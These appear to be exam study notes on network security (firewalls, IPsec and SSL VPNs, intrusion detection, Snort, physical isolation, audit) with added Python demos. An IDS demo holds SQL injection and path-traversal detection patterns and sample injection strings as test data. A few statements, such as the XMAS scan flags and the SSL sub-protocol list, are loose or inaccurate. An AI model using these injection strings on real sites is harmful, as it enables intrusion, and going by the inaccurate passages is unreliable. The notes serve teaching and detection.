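The pool runs out at the third host, while PAT serves all three flows from one address; an inbound packet to a port with no table entry has nowhere to go, which is why PAT also hides internal hosts from unsolicited connections.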

In addition to integrating the packet filtering, stateful inspection, address translation and other functions of traditional firewalls, next-generation firewalls also provide application identification and control, can respond to the evolution of security threats, detect hidden network activities, respond dynamically and quickly to attacks, and support new functions such as unified security policy deployment and intelligent security management.
(1) Application identification and control. It does not rely on ports. Through in-depth content analysis of network data packets, it can accurately identify application layer protocols and applications, provide application-level function control, and support application security protection.
(2) Intrusion Prevention (IPS). Ability to detect and protect against attacks based on vulnerability characteristics, such as SQL injection attacks.
(3) Data leakage prevention. Identify and filter transmitted files and content, accurately identify the true types of common files, such as Word, Excel, PPT, PDF, etc., and filter sensitive content.
(4) Malicious code protection. Using reputation-based malicious detection technology, it can identify malicious files and websites. Build a Web reputation database, conduct threat analysis and reputation rating on Internet website resources (IP, URL, domain name, etc.), list website resources containing malicious code in the Web reputation database, and then use content filtering technology to prevent users from accessing websites with bad reputations, thereby achieving intelligent protection of end-user security.
(5) URL classification and filtering. Build a URL classification library that contains different types of URL information (such as bad remarks, online "phishing", forum chats, etc.) to achieve accurate and efficient filtering of websites unrelated to work, bad information, and high-risk websites.
(6) Bandwidth management and QoS optimization. Through intelligent identification of business applications, it can effectively manage the bandwidth used by network users/IPs, ensure the bandwidth of key businesses and key users, and optimize the utilization of network resources.
(7) Encrypted communication analysis. Monitor and analyze encrypted network traffic such as SSL and SSH through technologies such as man-in-the-middle proxy and redirection.

9 (Key points). VPN
1. The domestic SM1 and SM4 cryptographic algorithms and the SM3 hash algorithm can all be used in VPNs.

The core technology of VPN is the cryptographic algorithm. VPN uses cryptographic algorithms to encrypt and transform the information that needs to be transmitted, thereby ensuring that unauthorized users on the network cannot read the information.

Types of VPNs:
link layer VPN, network layer VPN, transport layer VPN

1. Components of VPN
• Consists of client, transmission medium (using "tunnel" technology) and server.
• A VPN server must be configured in the enterprise's intranet; one side is connected to the enterprise's internal private network, and the other side is connected to the Internet.

The main service functions of VPN: confidentiality service, integrity service and authentication service.

2. VPN has two types of authentication access control: user identity authentication and data integrity and legality authentication.

3. AH protocol: Also called the authentication header protocol, it ensures data integrity and data source authentication, and cannot provide confidentiality services for IP data packets.
ESP protocol: It can provide authentication, encryption of data packets and all the functions of AH.

Both IP AH and IP ESP have two working modes, namely transparent mode (Transport Mode) and tunnel mode (Tunnel Mode). Transparent mode only protects the data payload in the IP packet, while tunnel mode protects the header and data field of the IP packet. Therefore, in tunnel mode, a new IP packet header will be created, and the old IP packet (referring to the IP packet that requires security processing) will be used as the new IP packet data.
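The two AH encapsulations at byte level, as an added example that is not part of the original notes. It is a simplified IPv4-only sketch: the key, SPI values and addresses are constructed, HMAC-SHA-256 truncated to 128 bits is an assumed integrity algorithm, and anti-replay handling and ESP encryption are left out.

```python
import hashlib
import hmac
import struct

PROTO_TCP, PROTO_IPIP, PROTO_AH = 6, 4, 51
ICV_LEN = 16  # assumed: HMAC-SHA-256 output truncated to 128 bits


def checksum(data):
    """Standard Internet checksum over a header of even length."""
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def ipv4_header(src, dst, proto, payload_len, ttl=64):
    """Build a 20-byte IPv4 header (no options) with a valid checksum."""
    def pack(csum):
        return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 0, 0,
                           ttl, proto, csum, bytes(map(int, src.split("."))),
                           bytes(map(int, dst.split("."))))
    return pack(checksum(pack(0)))


def _icv(key, ip_header, ah_fixed, inner):
    """Integrity check value. Per RFC 4302 it also covers the immutable fields
    of the outer IP header; fields routers may change are zeroed first."""
    h = bytearray(ip_header)
    h[1] = 0                 # TOS/DSCP
    h[6:8] = b"\x00\x00"     # flags and fragment offset
    h[8] = 0                 # TTL
    h[10:12] = b"\x00\x00"   # header checksum
    data = bytes(h) + ah_fixed + bytes(ICV_LEN) + inner
    return hmac.new(key, data, hashlib.sha256).digest()[:ICV_LEN]


def ah_protect(packet, key, spi, seq, tunnel=None):
    """Apply AH. tunnel=(gw_src, gw_dst) selects tunnel mode, None transport mode."""
    orig_hdr, orig_payload = packet[:20], packet[20:]
    if tunnel:   # new outer header; the whole original packet becomes the data
        inner, next_hdr = packet, PROTO_IPIP
        src, dst = tunnel
    else:        # original addresses are kept; AH sits between header and payload
        inner, next_hdr = orig_payload, orig_hdr[9]
        src = ".".join(map(str, orig_hdr[12:16]))
        dst = ".".join(map(str, orig_hdr[16:20]))
    ah = struct.pack("!BBHII", next_hdr, (12 + ICV_LEN) // 4 - 2, 0, spi, seq)
    outer = ipv4_header(src, dst, PROTO_AH, len(ah) + ICV_LEN + len(inner))
    return outer + ah + _icv(key, outer, ah, inner) + inner


def ah_verify(packet, key):
    """Return (next_header, inner_bytes) if the ICV is valid, otherwise None."""
    outer, ah, icv = packet[:20], packet[20:32], packet[32:32 + ICV_LEN]
    inner = packet[32 + ICV_LEN:]
    if outer[9] != PROTO_AH or not hmac.compare_digest(icv, _icv(key, outer, ah, inner)):
        return None
    return ah[0], inner


KEY = b"constructed-demo-key"                # constructed; a real SA key comes from IKE
PAYLOAD = b"GET /payroll HTTP/1.1\r\n\r\n"    # constructed, stands in for a TCP segment
ORIGINAL = ipv4_header("10.1.1.10", "10.2.2.20", PROTO_TCP, len(PAYLOAD)) + PAYLOAD


def run_demo():
    transport = ah_protect(ORIGINAL, KEY, spi=0x1001, seq=1)
    tunnel = ah_protect(ORIGINAL, KEY, spi=0x1002, seq=1,
                        tunnel=("198.51.100.1", "203.0.113.1"))
    tampered = tunnel.replace(b"payroll", b"pAyroll")
    routed = bytearray(tunnel)
    routed[8] -= 1                           # a router decrements the outer TTL
    return {
        "transport_outer_dst": ".".join(map(str, transport[16:20])),
        "tunnel_outer_dst": ".".join(map(str, tunnel[16:20])),
        "transport_inner": ah_verify(transport, KEY),
        "tunnel_inner_is_original": ah_verify(tunnel, KEY) == (PROTO_IPIP, ORIGINAL),
        "tamper_detected": ah_verify(tampered, KEY) is None,
        "ttl_change_accepted": ah_verify(bytes(routed), KEY) is not None,
        "payload_readable": PAYLOAD in tunnel,   # AH gives no confidentiality
    }


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(name, value)
```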

The working mode of IPSec VPN products should support tunnel mode and transport mode. Tunnel mode is applicable to hosts and gateways, while transport mode is an optional feature and is only applicable to hosts.

4. IPsec uses the Internet Key Exchange protocol (IKE), the Internet Security Association and Key Management Protocol (ISAKMP), and the Oakley key exchange protocol.

The main advantage of IPSec technology is its transparency: the provision of security services does not require changes to the application. However, the problems it brings are increased difficulty of network security management and reduced network transmission performance.

Transparency, also called concealment, is the basic requirement for information disguise. It uses the attributes of the human visual or auditory system and undergoes a systematic hiding process so that there is no obvious degradation of the target data.

The IKE protocol is an application layer protocol based on UDP. It is mainly used for SA negotiation, key management, and key exchange.
The IKE protocol has two versions: IKEv1 and IKEv2. Compared with IKEv1, IKEv2 fixes many recognized cryptographic security vulnerabilities and improves security performance, while simplifying the negotiation process and improving negotiation efficiency.
The IKE protocol is a hybrid protocol that combines three protocols: ISAKMP (Internet Security Association and Key Management Protocol), the Oakley protocol, and the SKEME protocol. Among them, ISAKMP defines the establishment process of the IKE SA. The core of the Oakley and SKEME protocols is the DH (Diffie-Hellman) algorithm, which is mainly used to safely distribute keys and verify identities on the Internet to ensure the security of data transmission. The encryption keys and verification keys required by the IKE SA and IPSec SA are generated through the DH algorithm, which also supports dynamic key refresh.

The client requires the installation of L2TP software. L2TP uses a dedicated tunnel protocol that runs on UDP port 1701.

5. The SSL protocol includes: the handshake protocol, the change cipher spec protocol, the alert protocol, and the record protocol. The handshake protocol also includes: the change cipher spec protocol and the alert protocol.

The handshake protocol is used for identity authentication and security parameter negotiation; the change cipher spec protocol is used to notify changes in security parameters; the alert protocol is used for close notifications and error alerts; the record layer protocol is used for segmentation, compression and decompression, encryption and decryption, integrity checking, etc. of transmitted data.

In fact, the SSL protocol is located between the application layer and the transport layer. It can provide security guarantee for any application layer protocol based on reliable connections such as TCP, and provide security support for data communication.

6. SSL three secure communication services:
Point-to-point identity authentication: using asymmetric encryption;
Confidentiality (using AES): encryption processing, encrypting data to prevent data from being stolen midway;
Integrity: maintaining the integrity of the data to ensure that the data is not changed during transmission;
Authentication: authenticates the true identity of the server to ensure that the data is sent to the correct client and server.

TLS Protocol
Transport Layer Security (TLS) is used to provide confidentiality and data integrity between two communicating applications.
The protocol consists of two layers: TLS Record and TLS Handshake.
TLS is an upgraded version of SSL. Specifically, SSL was originally a secure transmission protocol designed by Netscape and mainly used for the Web. At that time, SSL was just one company's security protocol. Later, the IETF, an organization dedicated to the development and promotion of Internet standards, considered the protocol good, so it upgraded and standardized it (RFC 2246) based on SSL 3.0 and named it TLS (Transport Layer Security).

The working modes of SSL VPN products are divided into two types:
client-server mode and gateway-gateway mode.

The SSL VPN protocol provides 3 types of secure communication services:
(1) Confidential communication. Data encryption and decryption use symmetric cryptography algorithms.
(2) Point-to-point identity authentication. Use an asymmetric cryptographic algorithm.
(3) Reliable communication. Information integrity check is included during information transmission, using a key-protected message authentication code (MAC). The calculation of MAC uses a secure hash function, such as SHA and MD5.

The first phase establishment method of ipsec VPN tunnel is divided into main mode and aggressive mode. The main difference between these two modes is the negotiation method used in IKE negotiation.
The specific differences are:
1. Main mode requires three stages during IKE negotiation: SA exchange, key exchange, ID exchange and verification; aggressive mode has only two stages: SA exchange and key generation, ID exchange and verification.
2. Main mode generally uses IP address to identify the peer device; while aggressive mode can use IP address or domain name to identify the peer device.
Therefore, in comparison, the main mode is more secure, while the aggressive mode negotiates faster. Two or more devices of the VPN must be set to the same mode in order for the VPN to be successfully established.

Respective applicable scenarios:
IKE main mode: applicable when the public IP addresses of both devices are fixed static IP addresses.

Aggressive mode: applicable when the public network IP is dynamic, for example when the external line uses ADSL dial-up and the public IP obtained is not fixed. It is also applicable when there is a NAT device, that is, when the firewall is placed on the intranet in bypass mode or bridge mode and must pass through other egress equipment to establish a VPN with branch equipment.
There is also an end-to-point model, in which a single remote endpoint, such as an employee on a business trip, accesses the enterprise VPN.

Both IP AH and IP ESP have two working modes, namely transparent mode (Transport Mode) and tunnel mode (Tunnel Mode). Transparent mode only protects the data field (data payload) of IP packets, while tunnel mode protects the header and data fields of IP packets.

7. IPsec has two modes: transport and tunnel.

8. SSL VPN has two modes: client to server and gateway to gateway.

9. IPsec VPN requirements:
Asymmetric cryptographic algorithm: 1024-bit RSA or the 256-bit SM2 algorithm, used for digital signatures and digital envelopes.
Symmetric cryptographic algorithm: the SM1 algorithm with 128-bit blocks, used for key negotiation and data encryption.
Cryptographic hash algorithm: SM3, used for symmetric key generation and integrity verification.

10. SSL VPN:
Asymmetric algorithms: the 256-bit SM2 elliptic curve algorithm, the identity-based cryptographic algorithm SM9, and the RSA algorithm.
Symmetric cryptographic algorithm: the SM1 algorithm.
Cryptographic hash algorithm: SM3, used for symmetric key generation and integrity verification.

The main functions of IPSec VPN include: random number generation, key negotiation, secure message encapsulation, NAT traversal, and identity authentication. Identity authentication data should support digital certificates or public-private key pairs, and the IP protocol version should support the IPv4 protocol or the IPv6 protocol.

The main functions of SSL VPN include: random number generation, key negotiation, secure message transmission, identity authentication, access control, key update, and client host security check.

Main performance indicators of ipsec: encryption and decryption throughput, encryption and decryption delay, encryption and decryption packet loss rate, number of new connections per second

SSL VPN main performance indicators: maximum number of concurrent users, maximum number of concurrent connections, number of new connections per second, throughput

11. Three types of VPN applications:
remote access virtual network: remote access to the VPN network within the company for business trips.
Enterprise internal virtual network: VPN network established by all branches.
Enterprise extended virtual network: VPN network connected by partners.

10 (Key points) Intrusion detection model CIDF: event generator, event analyzer, response unit, event database.
The purpose of intrusion detection is not to prevent attacks, but to use detection technology to discover behaviors in the system that attempt to violate, or have already violated, security policies.

An intrusion detection system mainly consists of the following functional modules: data collection module, intrusion analysis engine module, emergency processing module, management configuration module and related auxiliary modules. The function of the data collection module is to provide analysis data for the intrusion analysis engine module, including operating system audit logs, application running logs, and network data packets. The function of the intrusion analysis engine module is to analyze the collected data according to a certain algorithm based on the information provided by the auxiliary module (such as attack mode), determine whether there is an intrusion behavior, and generate an intrusion alarm. This module is the core module of the intrusion detection system. The function of the management configuration module is to provide configuration services for other modules and is the interface between modules in the IDS system and users. The function of the emergency processing module is to provide emergency response services after an intrusion occurs, such as shutting down network services, interrupting network connections, starting backup systems, etc. The function of the auxiliary module is to assist the intrusion analysis engine module to work and provide it with corresponding information, such as attack signature database, vulnerability information, etc. Figure 10-5 shows a general intrusion detection system structure.
[Figure 10-5: general intrusion detection system structure]
The system in the picture is a broad concept and may be a workstation, network segment, server, firewall, Web server, enterprise network, etc. Although each IDS is conceptually the same, in specific implementation, there are differences in key aspects such as data analysis methods, data collection, and protection objects.

According to the source of IDS detection data and its security scope, IDS can be divided into three major categories:
The first category is the host-based intrusion detection system (HIDS for short), which detects intrusion behavior by analyzing host information;
the second category is the network-based intrusion detection system (NIDS for short), which discovers intrusion behavior by obtaining data packets in network communications and scanning these packets for attack characteristics or anomaly modeling;
the third category is the distributed intrusion detection system (DIDS for short), which collects detection data from multiple hosts and multiple network segments, or collects alarm information from a single IDS, and conducts comprehensive analysis based on the collected information to discover intrusion behavior.

Several common misuse detection methods:
(1) Misuse detection method based on conditional probability
(2) Misuse detection method based on state transition
(3) Misuse detection method based on keyboard monitoring (aliases; cannot detect automated attacks by malicious programs)
(4) Rule-based misuse detection method (Snort)
Advantages:
• Misuse detection has strong divisibility and independence, and can reduce the size of the pattern database
• It is highly targeted, and its detection efficiency for known intrusion methods is very high
• Ability to provide a fuzzy intrusion detection engine
Disadvantages:
• Scalability and performance are related to the size and architecture of the pattern database
• Poor scalability
• Usually has no self-learning ability; analyzing new attacks requires supplementing the pattern database
• Attack behavior is difficult to pattern

Pay attention to the four types of behavior detection:
① The behavior is an intrusion, but it does not behave abnormally;
② The behavior is not an intrusion, but it behaves abnormally;
③ The behavior is neither an intrusion nor abnormal;
④ The behavior is an intrusion, and it behaves abnormally.

Classification of anomaly-based intrusion detection technology:
1. Statistics-based anomaly detection methods
2. Pattern prediction-based anomaly detection methods
3. Text classification-based anomaly detection methods
4. Bayesian inference-based anomaly detection methods
Advantages:
• Consistent with the theory of abnormal data changes and suited to the laws by which things develop
• The checking algorithm is relatively universal, and tracking variables does not require a large amount of memory
• It has the ability to detect and respond to some new attacks
Disadvantages:
• The data assumptions may be unreasonable, and the weighting algorithm may be statistically inaccurate
• Easily cause misjudgment of sudden normal events
• Low sensitivity to long-term, stable attack methods

1. The specification-based intrusion detection method (specification-based intrusion detection) lies between anomaly detection and misuse detection. Its basic principle is to use a policy description language, PE-grammars, to define in advance the safe operation execution sequences of the system's privileged programs. Each privileged program has a set of safe operation sequences, and these operation sequences constitute the security trace policy of the privileged program. If the operation sequence of a privileged program does not comply with the defined operation sequences, an intrusion alarm is issued. The advantage of this approach is that it can discover not only known attacks but also unknown attacks.

Intrusion detection system classification:
host-based intrusion detection system (HIDS),
network-based intrusion detection system (NIDS),
distributed intrusion detection system (DIDS).
Distributed intrusion detection systems can be divided into two types, namely host-based distributed intrusion detection systems and network-based distributed intrusion detection systems.

A host-based intrusion detection system, referred to as HIDS, collects information such as log files, system calls, application usage, system resources, network communications, and user usage of the host system, analyzes whether this information contains attack characteristics or anomalies, and uses this to determine whether the host has been invaded. Intrusion behavior will cause changes in the host system.
HIDS can detect attacks that network-based intrusion detection systems cannot detect;
a host-based intrusion detection system can run on networks that apply encryption, as long as the encrypted information is decrypted on or before arrival at the monitored host.

HIDS is generally suitable for detecting the following intrusion behaviors:
• Port or vulnerability scanning of the host;
• Repeated failed login attempts;
• Remote password cracking;
• Adding user accounts to the host system;
• Service startup or stop;
• System restart;
• File integrity or permission changes;
• Registry modifications;
• Changes to important system startup files;
• Abnormal program calls;
• Denial of service attacks.

NIDS listens to the network system, captures network data packets, and identifies intrusion behavior based on whether the network packets contain attack characteristics or whether the network communication flow is abnormal. It is mostly divided into two parts: detector and management controller.
NIDS usually consists of a set of single-purpose computers, which are divided into two parts: detectors and management controllers.

Intrusion behaviors that NIDS can detect:
synchronization storm (SYN Flood);
distributed denial of service attack (DDoS);
network scanning;
buffer overflow;
protocol attack;
abnormal traffic;
illegal network access.

The distributed intrusion detection system based on host detection, referred to as HDIDS, is divided into two parts: host detectors and an intrusion management controller. HDIDS configures and manages host detectors hierarchically and by area, integrating them into a system that can monitor and protect hosts distributed in network areas. HDIDS is used to protect key servers on the network or other systems with sensitive information. It uses the host's system resources, system calls, audit logs and other information to determine whether the host system is running in compliance with security rules. In the actual work process, host detectors are mostly installed directly on each protected host system in the form of a security agent, and are remotely controlled through the system management console in the network. This centralized control method makes it easy to monitor and manage the status of the system and update the software of the detection module.

The structure of NDIDS is divided into two parts: network detectors and a management controller. Network detectors are deployed in important network areas, such as the network segment where the servers are located, and are used to collect network communication data and business data flows. The collected information is analyzed using two methods, anomaly and misuse. If an attack or abnormal network behavior is found, alarm information is sent to the management controller.
DIDS is generally suitable for large-scale networks or geographically dispersed networks. Using this structure is beneficial to realizing distributed security management of the network. Network intrusion detection systems currently on the market generally support distributed structures.

Intrusion detection related indicators:
reliability, availability, scalability, timeliness, accuracy, and security.

Intrusion detection application scenario types:
1. Internet protection
2. Website intrusion detection and protection
3. Network attack blocking
4. Host terminal malicious code detection
5. Network security monitoring, early warning and emergency response
6. Network security level protection

Traffic detection can realize:
intrusion detection,
user traffic accounting,
load balancing monitoring,
protocol debugging,
service quality monitoring,
network optimization,
performance analysis,
network error correction

Passive attack:
only steals, sniffs, and analyzes data without affecting the normal operation of the network and services.

The principle of XMAS scanning is similar to that of NULL scanning. The ACK, FIN, RST, SYN, URG, and PSH flags in the TCP packet are set to 1 and then sent to the target host. The target host will not return any information if the target port is open.

2. Intrusion detection system classification:
Host-based: analyzes system logs, applications and system calls, suitable for stand-alone hosts.

Intrusion detection technology
Anomaly detection: relies on behavioral signature library
Misuse detection: relies on attack pattern library

Misuse intrusion detection is often called the signature-based intrusion detection method. It refers to detecting intrusion behavior based on known intrusion patterns. Attackers often exploit vulnerabilities in systems and application software to carry out attacks, and these vulnerability-based attack methods have certain characteristic patterns. If the intruder's attack method happens to match a characteristic pattern in the detection system, the intrusion behavior will be detected immediately, as shown in Figure 10-3.
The prerequisite for misuse intrusion detection is that the intrusion behavior can be characterized in some way, and the process of intrusion detection is actually a pattern matching process.

[Figure 10-3]

Anomaly-based intrusion detection technology
The anomaly detection method establishes a "trajectory" of the normal behavior of the system through statistical analysis of computer or network resources, defines a set of values for the system's normal conditions, and then compares the system's running values with the defined "normal" conditions to determine whether there are signs of being attacked, as shown in the figure below.

[Figure: anomaly-based intrusion detection]
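Misuse detection and anomaly detection run over the same observations, as an added example that is not part of the original notes; it also sorts each observation into the four behavior types ① to ④ listed earlier. The signature patterns, baseline values, request lines and the mean plus 3 standard deviations threshold are all constructed assumptions.

```python
import re
import statistics

# Attack pattern library for misuse (signature) detection. Constructed patterns.
SIGNATURES = {
    "sql-injection": re.compile(r"(?i)union\s+select|'\s*or\s+1=1"),
    "path-traversal": re.compile(r"\.\./\.\./"),
}

# Constructed baseline: requests per minute from one client during normal operation.
BASELINE_RPM = [12, 15, 11, 14, 13, 16, 12, 15, 14, 13]

# Constructed observations: (request line, requests per minute, really an intrusion?)
OBSERVATIONS = [
    ("GET /item?id=1' OR 1=1--", 14, True),                     # known pattern, normal rate
    ("GET /report/export-all", 95, False),                      # legitimate burst
    ("GET /index.html", 13, False),                             # ordinary traffic
    ("GET /item?id=1 UNION SELECT pw FROM users", 120, True),   # known pattern, high rate
    ("POST /api/v2/debug-hook", 88, True),                      # no signature exists yet
]


def misuse_detect(request):
    """Pattern matching: return the name of the first matching signature, or None."""
    for name, pattern in SIGNATURES.items():
        if pattern.search(request):
            return name
    return None


def build_profile(samples, k=3.0):
    """Normal profile: values above mean + k standard deviations count as abnormal."""
    return statistics.mean(samples) + k * statistics.stdev(samples)


def anomaly_detect(value, threshold):
    return value > threshold


def behaviour_case(is_intrusion, is_abnormal):
    """Number the outcome in the order the four behavior types are listed above."""
    if is_intrusion and not is_abnormal:
        return 1    # intrusion that looks normal: anomaly detection misses it
    if not is_intrusion and is_abnormal:
        return 2    # sudden normal event: anomaly detection raises a false alarm
    if not is_intrusion:
        return 3    # neither intrusion nor abnormal
    return 4        # intrusion that also looks abnormal


def evaluate():
    """Return (behavior case, matched signature) for every observation."""
    threshold = build_profile(BASELINE_RPM)
    rows = []
    for request, rpm, is_intrusion in OBSERVATIONS:
        abnormal = anomaly_detect(rpm, threshold)
        rows.append((behaviour_case(is_intrusion, abnormal), misuse_detect(request)))
    return rows


if __name__ == "__main__":
    print("threshold:", round(build_profile(BASELINE_RPM), 2))
    for obs, row in zip(OBSERVATIONS, evaluate()):
        print(row, obs[0])
```

The first observation is caught only by its signature, the last only by its rate, and the second is the misjudged sudden normal event named among the disadvantages of anomaly detection.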

Network-based: SYN Flood; distributed denial-of-service attack (DDoS); network scanning; buffer overflow; protocol attack; traffic anomaly; illegal network access.

Distributed-based: divided into two parts, a network detector and a network manager, to comprehensively analyze intrusion behavior from multiple hosts and multiple networks. Mainly used in large network architectures.

3. The intrusion detection system module consists of: data collection module, intrusion analysis module (core module), emergency processing module (emergency network disconnection, starting backups), management configuration module (providing configuration services for other modules), auxiliary module (assists the analysis engine's work).

Main penetration attacks: impersonation, bypass, authorized infringement.

4. Intrusion detection IDS deployment steps:
The first step is to determine the objects or protected network segments to be monitored by IDS according to the security policy requirements;
the second step, install IDS detectors on the monitored objects or protected network segments to collect the information required for network intrusion detection;
the third step, formulate the corresponding detection strategy based on the security requirements of the monitored object or protected network segment;
the fourth step, select the appropriate IDS structure type based on the detection strategy;
the fifth step, configure the intrusion detection rules on the IDS;
the sixth step, test and verify whether the security policy of IDS is executed normally;
the seventh step, run and maintain IDS.

5. Snort is a commonly used open source network intrusion detection system. Its basic technical principle is to obtain network data packets, then perform intrusion detection based on security rules, and finally form alarm information.
Snort rules consist of two parts, namely rule header and rule options.
Snort open source intrusion detection includes three modules: sniffing, network intrusion detection, and packet recording.

The rule header contains the rule action, the protocol, the source and destination IP addresses with their network masks, and the source and destination port numbers. Rule options include alarm messages, the parts of the network packet to inspect, and the actions that the rule should take. Snort rules are as follows:

Rule headers and rule options are distinguished by "()": the content of the rule options is enclosed in parentheses. Common actions in rule headers include alert, log, pass, activate, and dynamic. Rule options are the core of the Snort intrusion detection engine. All Snort rule options are separated by semicolons, and each rule option keyword is separated from its parameters by a colon. Snort provides fifteen rule option keywords. Commonly used rule option keywords are msg and content: msg is used to display alarm information, and content is used to specify the content to match in network packets.
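The rule structure described above (header, parenthesized options, semicolon separators, keyword:parameter pairs), as an added example that is not part of the original notes: a small Python parser that splits a rule into header fields and options and flags rules missing msg or content. The sample rules are constructed, the function names are hypothetical, and only the five actions listed in these notes are accepted.

```python
# Added example: parse a Snort rule into its header and options.
ACTIONS = {"alert", "log", "pass", "activate", "dynamic"}  # the actions named in the notes
DIRECTIONS = {"->", "<>"}
HEADER_FIELDS = ("action", "protocol", "src_addr", "src_port",
                 "direction", "dst_addr", "dst_port")

# Constructed sample rule (header + options in parentheses).
SAMPLE_RULE = ('alert tcp any any -> 192.168.1.0/24 111 '
               '(content:"|00 01 86 a5|"; msg:"mountd access";)')


def split_options(body):
    """Split the option body on ';', ignoring ';' inside quotes or after a backslash."""
    parts, current, in_quotes, escaped = [], [], False, False
    for ch in body:
        if escaped:                      # character after a backslash is taken literally
            current.append(ch)
            escaped = False
        elif ch == "\\":
            current.append(ch)
            escaped = True
        elif ch == '"':
            current.append(ch)
            in_quotes = not in_quotes
        elif ch == ";" and not in_quotes:
            parts.append("".join(current).strip())
            current = []
        else:
            current.append(ch)
    if in_quotes:
        raise ValueError("unterminated quoted string in rule options")
    tail = "".join(current).strip()
    if tail:
        raise ValueError("option not terminated by ';': %r" % tail)
    return [p for p in parts if p]


def parse_rule(rule):
    """Return (header dict, list of (keyword, value) pairs in rule order)."""
    rule = rule.strip()
    open_idx = rule.find("(")
    if open_idx == -1 or not rule.endswith(")"):
        raise ValueError("rule options must be enclosed in parentheses")
    tokens = rule[:open_idx].split()
    if len(tokens) != len(HEADER_FIELDS):
        raise ValueError("rule header needs %d fields, got %d"
                         % (len(HEADER_FIELDS), len(tokens)))
    header = dict(zip(HEADER_FIELDS, tokens))
    if header["action"] not in ACTIONS:
        raise ValueError("unknown action %r" % header["action"])
    if header["direction"] not in DIRECTIONS:
        raise ValueError("unknown direction operator %r" % header["direction"])
    options = []
    for item in split_options(rule[open_idx + 1:-1]):
        keyword, sep, value = item.partition(":")   # keyword and parameter split on ':'
        value = value.strip()
        if len(value) >= 2 and value[0] == '"' and value[-1] == '"':
            value = value[1:-1]                      # drop the surrounding quotes
        options.append((keyword.strip(), value if sep else None))
    return header, options


def lint_rule(rule):
    """Flag rules that lack the two commonly used options, msg and content."""
    _, options = parse_rule(rule)
    keywords = [keyword for keyword, _ in options]
    findings = []
    if "msg" not in keywords:
        findings.append("no msg option: alerts carry no description")
    if "content" not in keywords:
        findings.append("no content option: no payload bytes are matched by content")
    return findings


if __name__ == "__main__":
    print(parse_rule(SAMPLE_RULE))
    print(lint_rule('log udp any any <> any 53 (sid:1000001;)'))
```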

ifconfig eth0 promisc: turns on promiscuous mode on the network card.

11. Physical isolation
1. The government intranet and the government extranet should be physically isolated, and the government extranet and the Internet should be logically isolated.

2. Indicators of network and terminal isolation products:
security function indicators, security performance indicators, and security assurance indicators.

3. Requirements for each product
Terminal isolation products: access control, non-bypassable, and object reuse.
Network isolation products: access control, attack resistance, auditing, data integrity, password support.
One-way network import: access control, attack resistance, auditing, data integrity, and data import status monitoring.

In March 2015, Israeli researchers designed a secret-stealing technology called BitWhisper, which establishes a covert channel between the attacker and the target system and steals data by detecting the heat generated by the device. The basic principle is that the sender's computer raises and lowers the temperature of equipment it controls in order to signal the receiving system; the receiver uses its built-in thermal sensor to detect the temperature change and translates this change into binary code, thereby achieving communication between two isolated computers.

4. Technical principles of physical isolation:
Avoid direct exchange of information and physical connection between two computers, and block network attacks between two computers.

According to the objects of isolation, network physical isolation systems can generally be divided into single-point isolation systems and regional isolation systems. The single-point isolation system mainly protects individual computer systems and prevents direct external attacks and interference. The regional isolation system is targeted at the network environment, preventing external attacks and protecting the internal network.
According to the information transmission direction of network physical isolation, network physical isolation systems can be divided into two-way network physical isolation systems and one-way network physical isolation systems.

Networks that adopt network physical isolation security protection measures still face the following risks:
• Illegal external network connections
• USB drive ferry attacks
• Security risks of network physical isolation products
• New attack methods targeting physical isolation

1. The implementation technology of the physical isolation mechanism mainly includes
• dedicated computer Internet access
• multiple PCs
• external network proxy service
• internal and external network line switcher
• single hard disk internal and external partitions
• dual hard disks
• gatekeeper
• protocol isolation technology
• one-way transmission components
• information ferry technology
• physical disconnection technology

Physical disconnection means that networks in different security domains cannot be connected directly or indirectly. In a physical network
environment, physical disconnection of networks in different security domains should technically ensure the disconnection of information in physical transmission and physical storage. Physical disconnection is usually accomplished by an electronic switch.

Terminal isolation products are used to connect two different security domains at the same time. They use physical disconnection technology to achieve physical isolation of security domains on the terminal through security isolation cards or security isolation computers.
Terminal isolation products generally connect to the target host in the form of isolation cards. Through an electronic switch, the isolation card connects, in a mutually exclusive manner, either security domain A together with the hard disk attached to security domain A, or security domain B together with the hard disk attached to security domain B, thereby achieving physical isolation of the two security domains. This type of product can also integrate the isolation card into the host and be used as a complete machine.

The network one-way import product is located between two different security domains. It constructs the only channel for one-way transmission of information through physical means (which can be based on electrical signal transmission or optical signal transmission), realizes one-way import of information, and ensures that only information the security policy allows to be transmitted can pass through, while no information is transmitted or fed back in the opposite direction.

Network isolation products connect two different security domains to implement
functions such as application proxy services, protocol conversion, information flow access control, content filtering, and information ferrying between the two security domains. The technical principle of the product adopts a "2+1" architecture,
which is composed of two hosts + dedicated isolation components. It uses protocol isolation technology and information ferry technology to achieve security domain security isolation and information exchange on the network. Among them, the special isolation components generally use isolation switching boards composed of special isolation chips that contain electronic switches and solidified information ferry control logic, or are security-enhanced hosts running special information transmission logic control programs.

The gatekeeper uses a GAP technology (derived from the English Air Gap) to enable secure data exchange and sharing between two or more networks without being connected. The technical principle is to use a switch with a control function to read and write storage security equipment, and connect or cut off the data exchange between two independent host systems through the setting of the switch.

A gatekeeper is required to connect classified and non-confidential networks, a single gatekeeper is used to connect a non-confidential network to the Internet, and a two-way gatekeeper is used when a non-confidential network is not connected to the Internet.

The gatekeeper agent can be regarded as data disassembly: it removes the header and trailer of the application protocol, retains only the data part, and transmits only the net data between the internal and external networks.
The connections between the two independent host systems and the gatekeeper are mutually exclusive. Therefore, there is no physical connection for communication between the two independent hosts, and the hosts' only operations on the gatekeeper are "read" and "write". The gatekeeper thus physically isolates the hosts and blocks direct attacks between them, reducing the possibility of online attacks to a great extent. However, gatekeepers still present security risks. For example, intruders can use malicious data-driven attacks: they hide malicious code in electronic documents, send them to the target network, and the malicious code is triggered through those documents, which constitutes an internal network security threat.

12. Network security audit generally includes: information acquisition, information storage, information analysis, information display and utilization, and system management.

The audit system includes three major functional modules: audit event collection and filtering, audit event recording and query, audit analysis and response to alarms

Common network audit data security analysis technologies include string matching, full-text search, data association, statistical reports,
visual analysis, etc.

Network security audit mechanisms mainly include host-based audit mechanisms, network communication audit mechanisms, application-based audit
mechanisms, etc.

A common system log data collection technology is to
aggregate event information generated in operating systems, databases, network devices and other systems into a unified server storage for query, analysis and management.

There are two types of network audit data storage technologies:
One is decentralized storage of the audit data each system generates, with the audit data stored in the different systems; currently, operating systems, databases, application systems, network devices, etc. can all store log data separately.
